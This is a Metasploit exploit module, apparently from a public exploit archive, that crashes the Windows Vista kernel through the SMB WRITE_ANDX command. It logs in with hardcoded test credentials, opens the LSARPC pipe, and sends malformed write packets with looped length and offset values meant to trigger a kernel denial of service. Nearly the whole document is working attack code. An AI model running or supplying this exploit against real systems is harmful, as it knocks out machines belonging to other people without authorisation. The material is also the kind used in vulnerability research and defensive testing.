Microsoft Windows - WRITE_ANDX SMB command handling Kernel DoS (Metasploit)



require 'msf/core'


module Msf
module Exploits
module Test


class BugTest < Msf::Exploit::Remote


    include Exploit::Remote::SMB


    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'test exploit',
            'Description'    =>     
                "tests",
            'Author'         => 'tests',
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 0 $',
            'Arch'           => 'x86',
            'Payload'        =>
                {
                    'Space' => 1000
                },
            'Targets'        => 
                [
                    [
                        'Windows VISTA',
                        {
                            'Platform' => 'win'
                        }
                    ],
                ],
            'DefaultTarget' => 0))
    end


    def subexploit(dlenlow, doffset,fillersize)

        print_line("1")

            datastore['SMBUser']='testuser'
            datastore['SMBPass']='testuser'
            datastore['SMBDomain']='COBAYA'
        datastore['SMBName']='COBAYA' 

        print_line("2")
        
        connect()

        print_line("3")

        smb_login()

        print_line("4")
 
               pkt = CONST::SMB_CREATE_PKT.make_struct

        pkt['Payload']['SMB'].v['Flags1'] = 0x18
        pkt['Payload']['SMB'].v['Flags2'] = 0xc807

        pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i
        pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i
        pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i
        pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i

        pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_NT_CREATE_ANDX

        pkt['Payload']['SMB'].v['WordCount'] = 24
        
        pkt['Payload'].v['AndX'] = 255
        pkt['Payload'].v['AndXOffset'] = 0xdede
        pkt['Payload'].v['FileNameLen'] = 14
        pkt['Payload'].v['CreateFlags'] = 0x16
        pkt['Payload'].v['AccessMask'] = 0x2019f  # Maximum Allowed
        pkt['Payload'].v['ShareAccess'] = 7
        pkt['Payload'].v['CreateOptions'] = 0x400040
        pkt['Payload'].v['Impersonation'] = 2       
        pkt['Payload'].v['Disposition'] = 1
        pkt['Payload'].v['Payload'] = "\x00\\\x00L\x00S\x00A\x00R\x00P\x00C" + "\x00\x00"


        simple.client.smb_send(pkt.to_s)

        print_line("5")

        ack = simple.client.smb_recv_parse(CONST::SMB_COM_NT_CREATE_ANDX)
        
        pkt = CONST::SMB_WRITE_PKT.make_struct

        data_offset = pkt.to_s.length - 4

        print_line("6")
        
        filler = Rex::Text.rand_text(fillersize)

        print_line("7")

        pkt['Payload']['SMB'].v['Signature1']=0xcccccccc
        pkt['Payload']['SMB'].v['Signature2']=0xcccccccc
        pkt['Payload']['SMB'].v['MultiplexID'] = simple.client.multiplex_id.to_i
        pkt['Payload']['SMB'].v['TreeID'] = simple.client.last_tree_id.to_i
        pkt['Payload']['SMB'].v['UserID'] = simple.client.auth_user_id.to_i
        pkt['Payload']['SMB'].v['ProcessID'] = simple.client.process_id.to_i
        pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_WRITE_ANDX
        pkt['Payload']['SMB'].v['Flags1'] = 0x18
        pkt['Payload']['SMB'].v['Flags2'] = 0xc807
        pkt['Payload']['SMB'].v['WordCount'] = 14
        pkt['Payload'].v['AndX'] = 255
        pkt['Payload'].v['AndXOffset'] = 0xdede
        pkt['Payload'].v['FileID'] = ack['Payload'].v['FileID']
        pkt['Payload'].v['Offset'] = 0
        pkt['Payload'].v['Reserved2'] = -1
        pkt['Payload'].v['WriteMode'] = 8
        pkt['Payload'].v['Remaining'] = fillersize
        pkt['Payload'].v['DataLenHigh'] = 0
        pkt['Payload'].v['DataLenLow'] = dlenlow #<==================
        pkt['Payload'].v['DataOffset'] = doffset #<====
        pkt['Payload'].v['DataOffsetHigh'] = 0xcccccccc #<====
        pkt['Payload'].v['ByteCount'] = fillersize#<====
        pkt['Payload'].v['Payload'] = filler

        print_line("8")
        
        simple.client.smb_send(pkt.to_s)
        
        print_line("9")

    end

    def exploit
        
        k=72
        j=0xffff
        while j>10000
            i=0xffff
            while i>10000
                begin
                    print_line("datalenlow=#{i} dataoffset=#{j} fillersize=#{k}")
                    subexploit(i,j,k)
                rescue
                    print_line("rescue")
                end
                i=i-10000
            end
            j=j-10000
        end
        
    end

end

end
end
end

# milw0rm.com [2008-09-15]